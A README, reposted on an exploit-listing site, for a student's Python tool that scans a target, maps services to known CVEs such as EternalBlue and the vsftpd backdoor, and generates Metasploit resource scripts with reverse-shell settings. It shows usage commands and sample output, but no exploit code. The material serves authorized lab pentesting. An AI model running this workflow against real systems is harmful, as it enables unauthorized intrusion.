Exploit for pentest-metasploit CVE-2007-2447 CVE-2007-3278 CVE-2008-0166 CVE-2009-3843 CVE-2010-2075 CVE-2011-2523 CVE-2012-2122 CVE-2017-0144 CVE-2021-41773

Name: Exploit for pentest-metasploit CVE-2007-2447 CVE-2007-3278 CVE-2008-0166 CVE-2009-3843 CVE-2010-2075 CVE-2011-2523 CVE-2012-2122 CVE-2017-0144 CVE-2021-41773
Rating: 5 (4 reviews)
2026-06-24 | CVSS 10.0
## https://sploitus.com/exploit?id=DC8CF54B-5E0D-55F4-B5C1-920406A0FF9F
# Penetration Testing with Metasploit

A structured penetration testing automation framework developed by **Aadarsh Bonthula** as part of a cybersecurity portfolio series focused on network security and ethical hacking fundamentals.

Automates the reconnaissance, vulnerability mapping, and reporting phases of a structured pentest. Maps discovered services to known CVEs, generates ready-to-run Metasploit resource scripts, and produces a formal penetration test report.

---

## What It Does

**Phase 1 — Reconnaissance**
- TCP port scan with banner grabbing across the target

**Phase 2 — Vulnerability Analysis**
- Cross-references discovered ports and service banners against a CVE database
- Maps findings to specific Metasploit exploit modules

**Phase 3 — Metasploit Preparation**
- Auto-generates `.rc` resource scripts for each finding
- Scripts are ready to run with `msfconsole -r .rc` in a lab environment

**Phase 4 — Report Generation**
- Exports a structured Markdown pentest report
- Includes: open ports, CVE findings, severity ratings, exploitation steps, and remediation recommendations

---

## Concepts Applied

| Concept | Reference |
|---------|-----------|
| TCP Port Scanning & Banner Grabbing | Chapter 4.2, 4.3 — Scanning & Enumeration (CodTech Material) |
| Metasploit Framework | Chapter 5.2 — Metasploit Framework Basics |
| Exploitation Methodology | Chapter 5 — Gaining Access: Exploitation Techniques |
| Penetration Testing Phases | Chapter 1 — Key phases of ethical hacking |
| Structured Reporting | Chapter 1 — Reporting phase; Chapter 12.3 — Writing Vulnerability Reports |

---

## Requirements

- Python 3.7+
- No external libraries for scanning/reporting
- **Metasploit Framework** (for executing generated `.rc` scripts)
- Authorized lab target (e.g., Metasploitable 2, Kioptrix Level 1)

---

## Project Structure

```
pentest-metasploit/
├── pentest.py              # Main automation script
├── reports/                # Generated reports (auto-created)
│   ├── pentest_report_*.md # Structured pentest report
│   └── msf_scripts/        # Generated Metasploit resource scripts
├── demo/
│   └── sample_report.md    # Example report against Metasploitable 2
└── README.md
```

---

## Usage

```bash
# Basic scan against lab target
python3 pentest.py -t 192.168.1.10

# Custom port range with LHOST for reverse shells
python3 pentest.py -t 192.168.1.10 -p 1-1024 --lhost 192.168.1.5

# Full scan with custom output directory
python3 pentest.py -t 192.168.1.10 -p 1-65535 --threads 200 --output reports/
```

### Arguments

| Flag | Description | Default |
|------|-------------|---------|
| `-t` / `--target` | Target IP or hostname | Required |
| `-p` / `--ports` | Port range to scan | `1-1024` |
| `--lhost` | Your IP (for reverse shell payloads in .rc scripts) | `192.168.1.5` |
| `--threads` | Concurrent scan threads | `100` |
| `--timeout` | Socket timeout per port | `1.0s` |
| `--output` | Report output directory | `reports/` |

---

## Sample Output

```
============================================================
  Penetration Test — Aadarsh Bonthula
  Target  : 192.168.1.10
  Ports   : 1-1024
  LHOST   : 192.168.1.5
  Output  : reports/
  Started : 2025-06-10 16:00:00
============================================================

[Phase 1] Reconnaissance — Port Scan + Banner Grabbing

  [OPEN] 21     | FTP             | 220 (vsFTPd 2.3.4)
  [OPEN] 22     | SSH             | SSH-2.0-OpenSSH_4.7p1
  [OPEN] 139    | NetBIOS         | Samba
  [OPEN] 445    | SMB             | Unknown
  [OPEN] 3306   | MySQL           | MySQL
  [OPEN] 6667   | IRC             | UnrealIRCd 3.2.8.1

  6 open port(s) found.

[Phase 2] Vulnerability Analysis — CVE Mapping

  [CRITICAL] Port 21  — CVE-2011-2523: vsftpd 2.3.4 backdoor
  [CRITICAL] Port 139 — CVE-2007-2447: Samba usermap_script
  [CRITICAL] Port 6667 — CVE-2010-2075: UnrealIRCd backdoor
  [HIGH]     Port 3306 — CVE-2012-2122: MySQL auth bypass

[Phase 3] Metasploit Resource Scripts

  [MSF] Resource script: reports/msf_scripts/exploit_1_CVE_2011_2523.rc
  [MSF] Resource script: reports/msf_scripts/exploit_2_CVE_2007_2447.rc

[Phase 4] Report Generation

[*] Report saved: reports/pentest_report_20250610_1600.md
```

---

## CVE Coverage

The tool includes detection for the following common lab vulnerabilities:

| CVE | Port | Description | Severity |
|-----|------|-------------|----------|
| CVE-2011-2523 | 21 | vsftpd 2.3.4 backdoor | CRITICAL |
| CVE-2017-0144 | 445 | EternalBlue (MS17-010) | CRITICAL |
| CVE-2007-2447 | 139 | Samba usermap_script | CRITICAL |
| CVE-2010-2075 | 6667 | UnrealIRCd backdoor | CRITICAL |
| CVE-2021-41773 | 80 | Apache 2.4.49 path traversal | CRITICAL |
| CVE-2008-0166 | 22 | OpenSSH weak Debian keys | HIGH |
| CVE-2012-2122 | 3306 | MySQL auth bypass | HIGH |
| CVE-2007-3278 | 5432 | PostgreSQL default creds | HIGH |
| CVE-2009-3843 | 8180 | Tomcat manager WAR upload | HIGH |

---

## Legal Disclaimer

This tool is developed for **educational purposes and authorized penetration testing only**. Only test systems you own or have explicit written permission to assess. All exploitation must be conducted in isolated lab environments (e.g., Metasploitable 2, Kioptrix). Unauthorized use is illegal and unethical.

---

## Author

**Aadarsh Bonthula**
B.Tech Computer Science (Cybersecurity Specialization)
Manav Rachna International Institute of Research and Studies

GitHub: [NovocaineX](https://github.com/NovocaineX)

*Developed as part of a cybersecurity portfolio series focused on network security and ethical hacking fundamentals.*